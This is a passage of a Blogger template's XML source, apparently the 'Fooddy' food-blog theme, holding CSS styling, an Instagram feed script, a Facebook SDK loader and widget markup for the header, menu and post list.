2373font-size: 18px!important;
2374}
2375.title-404 {
2376font-size: 110px !important;
2377}
2378h1.post-title {
2379font-size: 17px;
2380}
2381.share-box {
2382overflow: hidden;
2383}
2384.top-bar-social #social a {
2385width: 24px;
2386height: 24px;
2387line-height: 24px;
2388}
2389}
2390]]></b:skin>
2391<style>
2392/*-------Typography and ShortCodes-------*/
2393.firstcharacter{float:left;color:#27ae60;font-size:75px;line-height:60px;padding-top:4px;padding-right:8px;padding-left:3px}.post-body h1,.post-body h2,.post-body h3,.post-body h4,.post-body h5,.post-body h6{margin-bottom:15px;color:#2c3e50}blockquote{font-style:italic;color:#888;border-left:5px solid #27ae60;margin-left:0;padding:10px 15px}blockquote:before{content:'\f10d';display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;margin-right:10px;color:#888}blockquote:after{content:'\f10e';display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;margin-left:10px;color:#888}.button{background-color:#2c3e50;float:left;padding:5px 12px;margin:5px;color:#fff;text-align:center;border:0;cursor:pointer;border-radius:3px;display:block;text-decoration:none;font-weight:400;transition:all .3s ease-out !important;-webkit-transition:all .3s ease-out !important}a.button{color:#fff}.button:hover{background-color:#27ae60;color:#fff}.button.small{font-size:12px;padding:5px 12px}.button.medium{font-size:16px;padding:6px 15px}.button.large{font-size:18px;padding:8px 18px}.small-button{width:100%;overflow:hidden;clear:both}.medium-button{width:100%;overflow:hidden;clear:both}.large-button{width:100%;overflow:hidden;clear:both}.demo:before{content:"\f06e";margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.download:before{content:"\f019";margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.buy:before{content:"\f09d";margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.visit:before{content:"\f14c";margin-right:5px;display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:400;line-height:normal;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.widget .post-body ul,.widget .post-body ol{line-height:1.5;font-weight:400}.widget .post-body li{margin:5px 0;padding:0;line-height:1.5}.post-body ul li:before{content:"\f105";margin-right:5px;font-family:fontawesome}pre{font-family:Monaco, "Andale Mono", "Courier New", Courier, monospace;background-color:#2c3e50;background-image:-webkit-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-moz-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-ms-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:-o-linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);background-image:linear-gradient(rgba(0, 0, 0, 0.05) 50%, transparent 50%, transparent);-webkit-background-size:100% 50px;-moz-background-size:100% 50px;background-size:100% 50px;line-height:25px;color:#f1f1f1;position:relative;padding:0 7px;margin:15px 0 10px;overflow:hidden;word-wrap:normal;white-space:pre;position:relative}pre:before{content:'Code';display:block;background:#F7F7F7;margin-left:-7px;margin-right:-7px;color:#2c3e50;padding-left:7px;font-weight:400;font-size:14px}pre code,pre .line-number{display:block}pre .line-number a{color:#27ae60;opacity:0.6}pre .line-number span{display:block;float:left;clear:both;width:20px;text-align:center;margin-left:-7px;margin-right:7px}pre .line-number span:nth-child(odd){background-color:rgba(0, 0, 0, 0.11)}pre .line-number span:nth-child(even){background-color:rgba(255, 255, 255, 0.05)}pre .cl{display:block;clear:both}#contact{background-color:#fff;margin:30px 0 !important}#contact .contact-form-widget{max-width:100% !important}#contact .contact-form-name,#contact .contact-form-email,#contact .contact-form-email-message{background-color:#FFF;border:1px solid #eee;border-radius:3px;padding:10px;margin-bottom:10px !important;max-width:100% !important}#contact .contact-form-name{width:47.7%;height:50px}#contact .contact-form-email{width:49.7%;height:50px}#contact .contact-form-email-message{height:150px}#contact .contact-form-button-submit{max-width:100%;width:100%;z-index:0;margin:4px 0 0;padding:10px !important;text-align:center;cursor:pointer;background:#27ae60;border:0;height:auto;-webkit-border-radius:2px;-moz-border-radius:2px;-ms-border-radius:2px;-o-border-radius:2px;border-radius:2px;text-transform:uppercase;-webkit-transition:all .2s ease-out;-moz-transition:all .2s ease-out;-o-transition:all .2s ease-out;-ms-transition:all .2s ease-out;transition:all .2s ease-out;color:#FFF}#contact .contact-form-button-submit:hover{background:#2c3e50}#contact .contact-form-email:focus,#contact .contact-form-name:focus,#contact .contact-form-email-message:focus{box-shadow:none !important}.alert-message{position:relative;display:block;background-color:#FAFAFA;padding:20px;margin:20px 0;-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;color:#2f3239;border:1px solid}.alert-message p{margin:0 !important;padding:0;line-height:22px;font-size:13px;color:#2f3239}.alert-message span{font-size:14px !important}.alert-message i{font-size:16px;line-height:20px}.alert-message.success{background-color:#f1f9f7;border-color:#e0f1e9;color:#1d9d74}.alert-message.success a,.alert-message.success span{color:#1d9d74}.alert-message.alert{background-color:#DAEFFF;border-color:#8ED2FF;color:#378FFF}.alert-message.alert a,.alert-message.alert span{color:#378FFF}.alert-message.warning{background-color:#fcf8e3;border-color:#faebcc;color:#8a6d3b}.alert-message.warning a,.alert-message.warning span{color:#8a6d3b}.alert-message.error{background-color:#FFD7D2;border-color:#FF9494;color:#F55D5D}.alert-message.error a,.alert-message.error span{color:#F55D5D}.fa-check-circle:before{content:"\f058"}.fa-info-circle:before{content:"\f05a"}.fa-exclamation-triangle:before{content:"\f071"}.fa-exclamation-circle:before{content:"\f06a"}.post-table table{border-collapse:collapse;width:100%}.post-table th{background-color:#eee;font-weight:bold}.post-table th,.post-table td{border:0.125em solid #333;line-height:1.5;padding:0.75em;text-align:left}@media (max-width: 30em){.post-table thead tr{position:absolute;top:-9999em;left:-9999em}.post-table tr{border:0.125em solid #333;border-bottom:0}.post-table tr + tr{margin-top:1.5em}.post-table tr,.post-table td{display:block}.post-table td{border:none;border-bottom:0.125em solid #333;padding-left:50%}.post-table td:before{content:attr(data-label);display:inline-block;font-weight:bold;line-height:1.5;margin-left:-100%;width:100%}}@media (max-width: 20em){.post-table td{padding-left:0.75em}.post-table td:before{display:block;margin-bottom:0.75em;margin-left:0}}
2394.FollowByEmail {
2395 clear: both;
2396}
2397</style>
2398<b:template-skin><![CDATA[
2399/*------Layout (No Edit)----------*/
2400body#layout .theme-opt {
2401display: block !important;
2402}
2403body#layout .option {
2404background-color: #2c3e50!important;
2405overflow: hidden!important;
2406}
2407body#layout .option h4 {
2408font-size: 16px;
2409padding: 4px 0 7px;
2410color: #fff!important;
2411}
2412body#layout .option .widget {
2413float: none;
2414width: 100%;
2415}
2416body#layout .option .widget.locked-widget .widget-content {
2417background-color: #34495e !important;
2418border-color: #455668 !important;
2419color: #fff!important;
2420}
2421body#layout .option .widget.locked-widget .widget-content a.editlink {
2422color: #fff !important;
2423border: 1px solid #233648;
2424border-radius: 2px;
2425padding: 2px 5px;
2426background-color: #233648;
2427}
2428body#layout #outer-wrapper {
2429 padding: 0;
2430 width: 800px
2431}
2432body#layout .section h4 {
2433color: #333;
2434text-align:center;
2435text-transform:uppercase;
2436letter-spacing:1.5px;
2437}
2438body#layout #content-wrapper {
2439 margin: 0 auto
2440}
2441body#layout .headerright {
2442 width: 395px;
2443}
2444body#layout #main-wrapper {
2445 float: left;
2446 width: 70%;
2447 margin: 0;
2448 padding: 0
2449}
2450
2451body#layout #sidebar-wrapper {
2452 float: right;
2453 width: 30%;
2454 margin: 0;
2455 padding: 5px 0 0;
2456}
2457body#layout #sidebar-wrapper .section {
2458background-color: #f8e244 !important;
2459border: 1px solid #fff
2460}
2461body#layout #sidebar-wrapper .section h4 {
2462color:#000;
2463}
2464body#layout #sidebar-wrapper .section .widget-content {
2465border-color: #5a7ea2!important
2466}
2467body#layout #sidebar-wrapper .section .draggable-widget .widget-wrap2 {
2468background-color: #0080ce !important
2469}
2470
2471body#layout #main-wrapper #main {
2472 margin-right: 4px;
2473 background-color: #5a7ea2;
2474 border-color: #34495e
2475}
2476body#layout #main-wrapper #main h4 {
2477 color: #fff!important
2478}
2479body#layout .layout-widget-description {
2480 display: none!important
2481}
2482body#layout #lowerbar-wrapper {
2483 width: 32%;
2484 float: left;
2485}
2486body#layout #Blog1 .widget-content {
2487 border-color: #34495e
2488}
2489body#layout .ads-blog-post-top, body#layout .ads-blog-post-bottom {
2490 display: block;
2491 visibility: visible;
2492}
2493body#layout .feat-slider-wrap .section {
2494background-color: #a0d3db !important;
2495border: 1px solid #a2dbeb
2496}
2497body#layout .FollowByEmail .widget-content:before {
2498 display: none;
2499}
2500body#layout .top-bar-social, body#layout .top-bar-menu {
2501width:auto;
2502}
2503body#layout .top-bar-social {
2504 display: block;
2505 float: none;
2506}
2507body#layout .bottom-bar-social {
2508display:block;
2509 float: none;
2510}
2511body#layout .tm-menu {
2512height: auto;
2513}
2514body#layout .sidetabs {
2515 padding: 0;
2516}
2517body#layout #menu {
2518display: block;
2519visibility:visible;
2520height: auto;
2521}
2522body#layout .preload {
2523 opacity: 1;
2524}
2525body#layout #menu .widget {
2526display: block;
2527visibility:visible;
2528}
2529/*------Layout (end)----------*/
2530]]></b:template-skin>
2531
2532<b:include data='blog' name='google-analytics'/>
2533<script src='https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js' type='text/javascript'/>
2534<script>
2535//<![CDATA[
2536// Generated by CoffeeScript 1.3.3
2537(function(){var e,t;e=function(){function e(e,t){var n,r;this.options={target:"instafeed",get:"popular",resolution:"thumbnail",sortBy:"none",links:!0,mock:!1,useHttp:!1};if(typeof e=="object")for(n in e)r=e[n],this.options[n]=r;this.context=t!=null?t:this,this.unique=this._genKey()}return e.prototype.hasNext=function(){return typeof this.context.nextUrl=="string"&&this.context.nextUrl.length>0},e.prototype.next=function(){return this.hasNext()?this.run(this.context.nextUrl):!1},e.prototype.run=function(t){var n,r,i;if(typeof this.options.clientId!="string"&&typeof this.options.accessToken!="string")throw new Error("Missing clientId or accessToken.");if(typeof this.options.accessToken!="string"&&typeof this.options.clientId!="string")throw new Error("Missing clientId or accessToken.");return this.options.before!=null&&typeof this.options.before=="function"&&this.options.before.call(this),typeof document!="undefined"&&document!==null&&(i=document.createElement("script"),i.id="instafeed-fetcher",i.src=t||this._buildUrl(),n=document.getElementsByTagName("head"),n[0].appendChild(i),r="instafeedCache"+this.unique,window[r]=new e(this.options,this),window[r].unique=this.unique),!0},e.prototype.parse=function(e){var t,n,r,i,s,o,u,a,f,l,c,h,p,d,v,m,g,y,b,w,E,S;if(typeof e!="object"){if(this.options.error!=null&&typeof this.options.error=="function")return this.options.error.call(this,"Invalid JSON data"),!1;throw new Error("Invalid JSON response")}if(e.meta.code!==200){if(this.options.error!=null&&typeof this.options.error=="function")return this.options.error.call(this,e.meta.error_message),!1;throw new Error("Error from Instagram: "+e.meta.error_message)}if(e.data.length===0){if(this.options.error!=null&&typeof this.options.error=="function")return this.options.error.call(this,"No images were returned from Instagram"),!1;throw new Error("No images were returned from Instagram")}this.options.success!=null&&typeof this.options.success=="function"&&this.options.success.call(this,e),this.context.nextUrl="",e.pagination!=null&&(this.context.nextUrl=e.pagination.next_url);if(this.options.sortBy!=="none"){this.options.sortBy==="random"?d=["","random"]:d=this.options.sortBy.split("-"),p=d[0]==="least"?!0:!1;switch(d[1]){case"random":e.data.sort(function(){return.5-Math.random()});break;case"recent":e.data=this._sortBy(e.data,"created_time",p);break;case"liked":e.data=this._sortBy(e.data,"likes.count",p);break;case"commented":e.data=this._sortBy(e.data,"comments.count",p);break;default:throw new Error("Invalid option for sortBy: '"+this.options.sortBy+"'.")}}if(typeof document!="undefined"&&document!==null&&this.options.mock===!1){a=e.data,this.options.limit!=null&&a.length>this.options.limit&&(a=a.slice(0,this.options.limit+1||9e9)),n=document.createDocumentFragment(),this.options.filter!=null&&typeof this.options.filter=="function"&&(a=this._filter(a,this.options.filter));if(this.options.template!=null&&typeof this.options.template=="string"){i="",o="",l="",v=document.createElement("div");for(m=0,b=a.length;m<b;m++)s=a[m],u=s.images[this.options.resolution].url,this.options.useHttp||(u=u.replace("http://","//")),o=this._makeTemplate(this.options.template,{model:s,id:s.id,link:s.link,image:u,caption:this._getObjectProperty(s,"caption.text"),likes:s.likes.count,comments:s.comments.count,location:this._getObjectProperty(s,"location.name")}),i+=o;v.innerHTML=i,S=[].slice.call(v.childNodes);for(g=0,w=S.length;g<w;g++)h=S[g],n.appendChild(h)}else for(y=0,E=a.length;y<E;y++)s=a[y],f=document.createElement("img"),u=s.images[this.options.resolution].url,this.options.useHttp||(u=u.replace("http://","//")),f.src=u,this.options.links===!0?(t=document.createElement("a"),t.href=s.link,t.appendChild(f),n.appendChild(t)):n.appendChild(f);document.getElementById(this.options.target).appendChild(n),r=document.getElementsByTagName("head")[0],r.removeChild(document.getElementById("instafeed-fetcher")),c="instafeedCache"+this.unique,window[c]=void 0;try{delete window[c]}catch(x){}}return this.options.after!=null&&typeof this.options.after=="function"&&this.options.after.call(this),!0},e.prototype._buildUrl=function(){var e,t,n;e="https://api.instagram.com/v1";switch(this.options.get){case"popular":t="media/popular";break;case"tagged":if(typeof this.options.tagName!="string")throw new Error("No tag name specified. Use the 'tagName' option.");t="tags/"+this.options.tagName+"/media/recent";break;case"location":if(typeof this.options.locationId!="number")throw new Error("No location specified. Use the 'locationId' option.");t="locations/"+this.options.locationId+"/media/recent";break;case"user":if(typeof this.options.userId!="number")throw new Error("No user specified. Use the 'userId' option.");if(typeof this.options.accessToken!="string")throw new Error("No access token. Use the 'accessToken' option.");t="users/"+this.options.userId+"/media/recent";break;default:throw new Error("Invalid option for get: '"+this.options.get+"'.")}return n=""+e+"/"+t,this.options.accessToken!=null?n+="?access_token="+this.options.accessToken:n+="?client_id="+this.options.clientId,this.options.limit!=null&&(n+="&count="+this.options.limit),n+="&callback=instafeedCache"+this.unique+".parse",n},e.prototype._genKey=function(){var e;return e=function(){return((1+Math.random())*65536|0).toString(16).substring(1)},""+e()+e()+e()+e()},e.prototype._makeTemplate=function(e,t){var n,r,i,s,o;r=/(?:\{{2})([\w\[\]\.]+)(?:\}{2})/,n=e;while(r.test(n))i=n.match(r)[1],s=(o=this._getObjectProperty(t,i))!=null?o:"",n=n.replace(r,""+s);return n},e.prototype._getObjectProperty=function(e,t){var n,r;t=t.replace(/\[(\w+)\]/g,".$1"),r=t.split(".");while(r.length){n=r.shift();if(!(e!=null&&n in e))return null;e=e[n]}return e},e.prototype._sortBy=function(e,t,n){var r;return r=function(e,r){var i,s;return i=this._getObjectProperty(e,t),s=this._getObjectProperty(r,t),n?i>s?1:-1:i<s?1:-1},e.sort(r.bind(this)),e},e.prototype._filter=function(e,t){var n,r,i,s,o;n=[],i=function(e){if(t(e))return n.push(e)};for(s=0,o=e.length;s<o;s++)r=e[s],i(r);return n},e}(),t=typeof exports!="undefined"&&exports!==null?exports:window,t.Instafeed=e}).call(this);
2538
2539
2540 //]]></script>
2541
2542<script async='async' type='text/javascript'>
2543//<![CDATA[
2544(function(d, s, id) {
2545 var js, fjs = d.getElementsByTagName(s)[0];
2546 if (d.getElementById(id)) return;
2547 js = d.createElement(s); js.id = id;
2548 js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.5";
2549 fjs.parentNode.insertBefore(js, fjs);
2550}(document, 'script', 'facebook-jssdk'));
2551//]]>
2552</script>
2553<script type='text/javascript'>
2554//<![CDATA[
2555var no_image = "http://3.bp.blogspot.com/-Yw8BIuvwoSQ/VsjkCIMoltI/AAAAAAAAC4c/s55PW6xEKn0/s1600-r/nth.png";
2556var month_format = [, "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sept", "Oct", "Nov", "Dec"];
2557var more_text = "View More";
2558var comments_text = "<span>Post </span>Comment";
2559var POSTPAGER_OLDER = "Older Article <i class='fa fa-hand-o-right'></i>"; // post nav text "previous post"
2560var POSTPAGER_NEWER = "<i class='fa fa-hand-o-left'></i> Newer Article"; // post nav text "next post"
2561//]]>
2562</script>
2563</head>
2564<body expr:class='data:blog.pageType'>
2565<div class='theme-opt' style='display:none'>
2566 <b:section class='option' id='option' maxwidgets='1' name='Theme Options' showaddelement='yes'>
2567 <b:widget id='HTML200' locked='true' title='Boxed-Width Version (true/false)' type='HTML' version='1'>
2568 <b:widget-settings>
2569 <b:widget-setting name='content'/>
2570 </b:widget-settings>
2571 <b:includable id='main'>
2572 <b:if cond='data:content == "true"'>
2573 <style>@media only screen and (min-width:1200px){#outer-wrapper{max-width:1200px}}</style>
2574 </b:if>
2575 </b:includable>
2576 </b:widget>
2577 </b:section>
2578 </div>
2579<div id="outer-wrapper" class="<data:blog.pageType/><b:if cond='data:blog.url == data:blog.homepageUrl'> home</b:if><b:if cond='data:blog.pageType == "static_page"'> item</b:if><b:if cond='data:blog.pageType == "archive"'> index</b:if>">
2580<div class='top-bar'>
2581
2582 <div class='top-bar-wrapper row'>
2583
2584 <b:section class='top-bar-social blue' id='header social widget' maxwidgets='1' name='Top Social Widget' showaddelement='no'>
2585<b:widget id='LinkList230' locked='true' title='Social Media Icons' type='LinkList' version='1'>
2586 <b:widget-settings>
2587 <b:widget-setting name='link-5'>#</b:widget-setting>
2588 <b:widget-setting name='link-6'>#</b:widget-setting>
2589 <b:widget-setting name='link-3'>#</b:widget-setting>
2590 <b:widget-setting name='link-4'>#</b:widget-setting>
2591 <b:widget-setting name='text-1'>facebook</b:widget-setting>
2592 <b:widget-setting name='text-0'>twitter</b:widget-setting>
2593 <b:widget-setting name='text-3'>instagram</b:widget-setting>
2594 <b:widget-setting name='text-2'>gplus</b:widget-setting>
2595 <b:widget-setting name='text-5'>youtube</b:widget-setting>
2596 <b:widget-setting name='text-4'>rss</b:widget-setting>
2597 <b:widget-setting name='text-6'>pinterest</b:widget-setting>
2598 <b:widget-setting name='sorting'>NONE</b:widget-setting>
2599 <b:widget-setting name='link-1'>#</b:widget-setting>
2600 <b:widget-setting name='link-2'>#</b:widget-setting>
2601 <b:widget-setting name='link-0'>#</b:widget-setting>
2602 </b:widget-settings>
2603 <b:includable id='main'>
2604 <div class='widget-content'>
2605 <ul id='social'>
2606 <b:loop values='data:links' var='link'>
2607 <li><a expr:class='data:link.name' expr:href='data:link.target' expr:title='data:link.name'/></li>
2608 </b:loop>
2609 </ul>
2610 </div>
2611 </b:includable>
2612</b:widget>
2613</b:section>
2614 <div class='top-bar-menu'>
2615
2616
2617<div class='top-menu'>
2618 <form _lpchecked='1' action='/search' class='search-form' id='searchform' method='get'>
2619 <fieldset>
2620 <input id='s' name='q' onfocus='if(this.value=='Search')this.value='';' onwebkitspeechchange='transcribe(this.value)' type='text' value='Search' x-webkit-speech=''/>
2621 <button class='sbutton' id='search-image' style='border:0; vertical-align: top;background: transparent;'><i class='fa fa-search'/></button>
2622 </fieldset>
2623 </form>
2624</div></div>
2625 </div>
2626
2627 </div>
2628<div style='clear: both;'/>
2629<div id='header-wrapper'>
2630<div class='row' id='header-wrappers'>
2631 <div class='headerleft'>
2632 <b:section class='headerleft' id='headerleft' maxwidgets='1' showaddelement='no'>
2633 <b:widget id='Header1' locked='true' title='Fooddy (Header)' type='Header' version='1'>
2634 <b:widget-settings>
2635 <b:widget-setting name='displayUrl'>http://2.bp.blogspot.com/-ZPOuERJngQw/WbKjyZj4qQI/AAAAAAAAAD8/WOeDce7w2T0YSKLHwBJa331w3dAPJ0lngCK4BGAYYCw/s1600/Logo.png</b:widget-setting>
2636 <b:widget-setting name='displayHeight'>116</b:widget-setting>
2637 <b:widget-setting name='sectionWidth'>150</b:widget-setting>
2638 <b:widget-setting name='useImage'>true</b:widget-setting>
2639 <b:widget-setting name='shrinkToFit'>false</b:widget-setting>
2640 <b:widget-setting name='imagePlacement'>REPLACE</b:widget-setting>
2641 <b:widget-setting name='displayWidth'>285</b:widget-setting>
2642 </b:widget-settings>
2643 <b:includable id='main'>
2644
2645 <b:if cond='data:useImage'>
2646 <b:if cond='data:imagePlacement == "BEHIND"'>
2647 <!--
2648 Show image as background to text. You can't really calculate the width
2649 reliably in JS because margins are not taken into account by any of
2650 clientWidth, offsetWidth or scrollWidth, so we don't force a minimum
2651 width if the user is using shrink to fit.
2652 This results in a margin-width's worth of pixels being cropped. If the
2653 user is not using shrink to fit then we expand the header.
2654 -->
2655 <b:if cond='data:mobile'>
2656 <div id='header-inner'>
2657 <div class='titlewrapper' style='background: transparent'>
2658 <h1 class='title' style='background: transparent; border-width: 0px'>
2659 <b:include name='title'/>
2660 </h1>
2661 </div>
2662 <b:include name='description'/>
2663 </div>
2664 <b:else/>
2665 <div expr:style='"background-image: url(\"" + data:sourceUrl + "\"); " + "background-position: " + data:backgroundPositionStyleStr + "; " + data:widthStyleStr + "min-height: " + data:height + "_height: " + data:height + "background-repeat: no-repeat; "' id='header-inner'>
2666 <div class='titlewrapper' style='background: transparent'>
2667 <h1 class='title' style='background: transparent; border-width: 0px'>
2668 <b:include name='title'/>
2669 </h1>
2670 </div>
2671 <b:include name='description'/>
2672 </div>
2673 </b:if>
2674 <b:else/>
2675 <!--Show the image only-->
2676 <div id='header-inner'>
2677 <a expr:href='data:blog.homepageUrl' style='display: block'><h1 style='display:none'/>
2678 <img expr:alt='data:title' expr:height='data:height' expr:id='data:widget.instanceId + "_headerimg"' expr:src='data:sourceUrl' expr:width='data:width' style='display: block'/>
2679 </a>
2680 <!--Show the description-->
2681 <b:if cond='data:imagePlacement == "BEFORE_DESCRIPTION"'>
2682 <b:include name='description'/>
2683 </b:if>
2684 </div>
2685 </b:if>
2686 <b:else/>
2687 <!--No header image -->
2688 <div id='header-inner'>
2689 <div class='titlewrapper'>
2690 <h1 class='title'>
2691 <b:include name='title'/>
2692 </h1>
2693 </div>
2694 <b:include name='description'/>
2695 </div>
2696 </b:if>
2697</b:includable>
2698 <b:includable id='description'>
2699 <div class='descriptionwrapper'>
2700 <p class='description'><span><data:description/></span></p>
2701 </div>
2702</b:includable>
2703 <b:includable id='title'>
2704 <b:if cond='data:blog.url == data:blog.homepageUrl'>
2705 <data:title/>
2706 <b:else/>
2707 <a expr:href='data:blog.homepageUrl'><data:title/></a>
2708 </b:if>
2709</b:includable>
2710 </b:widget>
2711 </b:section>
2712</div>
2713<div style='clear: both;'/>
2714 </div>
2715<div class='navi-menu-wrap'>
2716<div class='navi-menu row'>
2717
2718 <b:section class='menu' id='menu' maxwidgets='1' name='Main Menu' showaddelement='yes'>
2719 <b:widget id='LinkList210' locked='true' title='Menu' type='LinkList' version='1'>
2720 <b:widget-settings>
2721 <b:widget-setting name='text-9'>Documentation</b:widget-setting>
2722 <b:widget-setting name='link-9'>http://www.sorabloggingtips.com/2017/08/how-to-setup-fooddy-blogger-template.html</b:widget-setting>
2723 <b:widget-setting name='text-8'>Seo Services</b:widget-setting>
2724 <b:widget-setting name='link-7'>http://fooddy-soratemplates.blogspot.com/soratemplates</b:widget-setting>
2725 <b:widget-setting name='link-8'>http://www.shardawebservices.com/</b:widget-setting>
2726 <b:widget-setting name='text-10'>Download this template</b:widget-setting>
2727 <b:widget-setting name='link-5'>http://fooddy-soratemplates.blogspot.com/p/page-markup-and-typography.html</b:widget-setting>
2728 <b:widget-setting name='link-6'>http://www.sorabloggingtips.com/2017/01/how-to-add-sitemap-widget-in-blogspot-blogs.html</b:widget-setting>
2729 <b:widget-setting name='link-3'>#</b:widget-setting>
2730 <b:widget-setting name='link-4'>#</b:widget-setting>
2731 <b:widget-setting name='text-1'>_Multi Dropdown</b:widget-setting>
2732 <b:widget-setting name='text-0'>Features</b:widget-setting>
2733 <b:widget-setting name='text-3'>__Dropdown 2</b:widget-setting>
2734 <b:widget-setting name='text-2'>__Dropdown 1</b:widget-setting>
2735 <b:widget-setting name='text-5'>_ShortCodes</b:widget-setting>
2736 <b:widget-setting name='text-4'>__Dropdown 3</b:widget-setting>
2737 <b:widget-setting name='text-7'>_Error Page</b:widget-setting>
2738 <b:widget-setting name='text-6'>_SiteMap</b:widget-setting>
2739 <b:widget-setting name='sorting'>NONE</b:widget-setting>
2740 <b:widget-setting name='link-1'>#</b:widget-setting>
2741 <b:widget-setting name='link-2'>#</b:widget-setting>
2742 <b:widget-setting name='link-0'>#</b:widget-setting>
2743 <b:widget-setting name='link-10'>http://www.soratemplates.com/2017/08/fooddy-blogger-templates.html</b:widget-setting>
2744 </b:widget-settings>
2745 <b:includable id='main'>
2746 <div class='widget-content'>
2747 <ul itemscope='' itemtype='http://schema.org/SiteNavigationElement'>
2748 <li><a expr:href='data:blog.homepageUrl'>Home</a></li>
2749 <b:loop values='data:links' var='link'>
2750 <li itemprop='name'><a expr:href='data:link.target' itemprop='url'><data:link.name/></a></li>
2751 </b:loop>
2752 </ul>
2753
2754 </div>
2755 </b:includable>
2756 </b:widget>
2757 </b:section>
2758
2759
2760
2761
2762
2763 </div>
2764<div style='clear: both;'/>
2765 </div>
2766 </div>
2767<b:if cond='data:blog.url == data:blog.homepageUrl'>
2768<div class='tyard-wrapper row'>
2769<b:section class='featured preload' id='featured' maxwidget='1' showaddelement='yes'>
2770 <b:widget id='HTML299' locked='true' title='' type='HTML' version='1'>
2771 <b:widget-settings>
2772 <b:widget-setting name='content'><![CDATA[<span data-type="tyard" data-label="Healthy%20Living"></span>]]></b:widget-setting>
2773 </b:widget-settings>
2774 <b:includable id='main'>
2775 <!-- only display title if it's non-empty -->
2776 <b:if cond='data:title != ""'>
2777 <h2 class='title'><data:title/></h2>
2778 </b:if>
2779 <div class='widget-content'>
2780 <data:content/>
2781 </div>
2782
2783 <!--b:include name='quickedit'/-->
2784</b:includable>
2785 </b:widget>
2786</b:section>
2787 </div>
2788<div style='clear: both;'/>
2789 </b:if>
2790
2791 <div class='row' id='content-wrapper'>
2792
2793 <div id='main-wrapper'>
2794 <b:section class='main' id='main' showaddelement='yes'>
2795 <b:widget id='Blog1' locked='true' title='Blog Posts' type='Blog' version='1'>
2796 <b:widget-settings>
2797 <b:widget-setting name='showDateHeader'>true</b:widget-setting>
2798 <b:widget-setting name='style.textcolor'>#48494d</b:widget-setting>
2799 <b:widget-setting name='showShareButtons'>true</b:widget-setting>
2800 <b:widget-setting name='authorLabel'>By</b:widget-setting>
2801 <b:widget-setting name='showCommentLink'>true</b:widget-setting>
2802 <b:widget-setting name='style.urlcolor'>#ffbd2f</b:widget-setting>
2803 <b:widget-setting name='showAuthor'>true</b:widget-setting>
2804 <b:widget-setting name='style.linkcolor'>#ffbd2f</b:widget-setting>
2805 <b:widget-setting name='style.unittype'>TextAndImage</b:widget-setting>
2806 <b:widget-setting name='style.bgcolor'>#000000</b:widget-setting>
2807 <b:widget-setting name='showAuthorProfile'>false</b:widget-setting>
2808 <b:widget-setting name='style.layout'>1x1</b:widget-setting>
2809 <b:widget-setting name='showLabels'>true</b:widget-setting>
2810 <b:widget-setting name='showLocation'>true</b:widget-setting>
2811 <b:widget-setting name='showTimestamp'>true</b:widget-setting>
2812 <b:widget-setting name='postsPerAd'>1</b:widget-setting>
2813 <b:widget-setting name='showBacklinks'>false</b:widget-setting>
2814 <b:widget-setting name='style.bordercolor'>#000000</b:widget-setting>
2815 <b:widget-setting name='showInlineAds'>false</b:widget-setting>
2816 <b:widget-setting name='showReactions'>false</b:widget-setting>
2817 </b:widget-settings>
2818 <b:includable id='main' var='top'>
2819 <b:if cond='!data:mobile'>
2820 <!-- posts -->
2821 <div class='blog-posts hfeed'>
2822
2823 <b:include data='top' name='status-message'/>
2824<div class='grid-post-home'>
2825 <b:loop values='data:posts' var='post'>
2826 <div class='post-outer'>
2827 <b:include data='post' name='post'/>
2828 <b:include cond='data:blog.pageType in {"static_page","item"}' data='post' name='comment_picker'/>
2829 </div>
2830
2831 <!-- Ad -->
2832 <b:if cond='data:post.includeAd'>
2833 <div class='inline-ad'>
2834 <data:adCode/>
2835 </div>
2836 </b:if>
2837 </b:loop>
2838 </div>
2839 </div>
2840
2841 <!-- navigation -->
2842 <b:include name='nextprev'/>
2843
2844 <!-- feed links -->
2845 <b:include name='feedLinks'/>
2846
2847 <b:else/>
2848 <b:include name='mobile-main'/>
2849 </b:if>
2850
2851 <b:if cond='data:top.showPlusOne'>
2852 <data:top.googlePlusBootstrap/>
2853 </b:if>
2854
2855</b:includable>
2856 <b:includable id='backlinkDeleteIcon' var='backlink'>
2857 <span expr:class='"item-control " + data:backlink.adminClass'>
2858 <a expr:href='data:backlink.deleteUrl' expr:title='data:top.deleteBacklinkMsg'>
2859 <img src='https://resources.blogblog.com/img/icon_delete13.gif'/>
2860 </a>
2861 </span>
2862</b:includable>
2863 <b:includable id='backlinks' var='post'>
2864 <a name='links'/><h4><data:post.backlinksLabel/></h4>
2865 <b:if cond='data:post.numBacklinks != 0'>
2866 <dl class='comments-block' id='comments-block'>
2867 <b:loop values='data:post.backlinks' var='backlink'>
2868 <div class='collapsed-backlink backlink-control'>
2869 <dt class='comment-title'>
2870 <span class='backlink-toggle-zippy'> </span>
2871 <a expr:href='data:backlink.url' rel='nofollow'><data:backlink.title/></a>
2872 <b:include data='backlink' name='backlinkDeleteIcon'/>
2873 </dt>
2874 <dd class='comment-body collapseable'>
2875 <data:backlink.snippet/>
2876 </dd>
2877 <dd class='comment-footer collapseable'>
2878 <span class='comment-author'><data:post.authorLabel/> <data:backlink.author/></span>
